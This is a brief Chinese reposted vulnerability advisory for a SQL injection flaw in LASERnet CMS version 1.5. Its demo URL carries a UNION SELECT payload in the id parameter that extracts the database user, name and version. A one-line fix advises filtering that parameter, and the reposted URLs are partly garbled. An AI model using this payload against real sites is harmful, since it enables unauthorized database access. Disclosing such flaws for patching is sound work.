利用方法: http://HdhCmsTest2cto测试数据 /index.php?id=[SQL] Demo: http://HdhCmsTest2cto测试数据 /index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ HdhCmsTest2cto测试数据 提供修复方案 过滤index.php页面id=参数输入
查看更多关于LASERnet CMS Version 1.5 SQL注入漏洞及修复 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12546